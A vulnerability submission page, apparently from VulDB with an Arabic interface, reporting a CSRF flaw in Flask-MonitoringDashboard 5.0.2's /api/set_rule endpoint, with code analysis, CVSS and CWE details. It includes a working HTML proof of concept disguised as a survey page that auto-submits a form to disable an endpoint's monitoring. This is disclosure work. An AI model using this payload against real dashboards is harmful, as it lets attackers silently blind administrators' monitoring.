إرسال #850880: flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRFالمعلومات

عنوانflask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF
الوصف# CSRF Vulnerability in Endpoint Monitoring Rule Tampering (/api/set_rule) ## Summary A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard rule-configuration endpoint `/api/set_rule`. The lack of CSRF protection allows an attacker to force an authenticated administrator to change the monitoring level of any tracked endpoint, disabling or altering observability without authorization. ## Vulnerability Details ### Configuration-Level Issue **File**: `flask_monitoringdashboard/core/auth.py` ```python def admin_secure(func): @wraps(func) def wrapper(*args, **kwargs): if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization if session.get(config.link + '_admin'): return func(*args, **kwargs) return redirect(url_for(config.blueprint_name + '.login')) return wrapper # ❌ No CSRF protection anywhere in the package # ❌ Session cookie has no SameSite attribute enforced ``` ### Endpoint-Level Code Analysis **File**: `flask_monitoringdashboard/views/endpoint.py` (Lines 127-138) ```python @blueprint.route("/api/set_rule", methods=["POST"]) @admin_secure def set_rule(): """The data from the form is validated and processed, such that the required rule is monitored""" endpoint_name = request.form["name"] value = int(request.form["value"]) # ❌ No CSRF token validation # ❌ No Origin/Referer verification with session_scope() as session: set_endpoint_rule(session, endpoint_name, value) # ⚠️ changes monitoring rule return "OK" ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ❌ No origin verification 3. ⚠️ Changes the monitoring rule/level for an arbitrary endpoint based only on the session cookie ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>Quick survey</title> </head> <body> <h2>???? Thanks for your feedback!</h2> <!-- Disable monitoring (value=0) for a target endpoint --> <form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/set_rule" method="POST"> <input type="hidden" name="name" value="some.endpoint"> <input type="hidden" name="value" value="0"> </form> <script> setTimeout(function() { document.getElementById('csrf-form').submit(); }, 1000); </script> </body> </html> ``` ## Impact **Monitoring/observability tampering** - An attacker can silently disable or alter monitoring rules for endpoints, undermining the integrity of the collected metrics and potentially hiding malicious activity from observability. --- **CVSS Score**: 4.3 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N` **CWE**: CWE-352 (Cross-Site Request Forgery) --- **Reported by**: flashzyc **Date**: 2026-06-07
المصدر⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/560
المستخدم
 flashzyc (UID 92850)
ارسال07/06/2026 09:02 AM (1 شهر منذ)
الاعتدال08/07/2026 09:39 AM (1 month later)
الحالةمكرر
إدخال VulDB376785 [flask-dashboard Flask-MonitoringDashboard حتى 5.0.2 تزوير طلبات عبر المواقع]
النقاط0

Interested in the pricing of exploits?

See the underground prices here!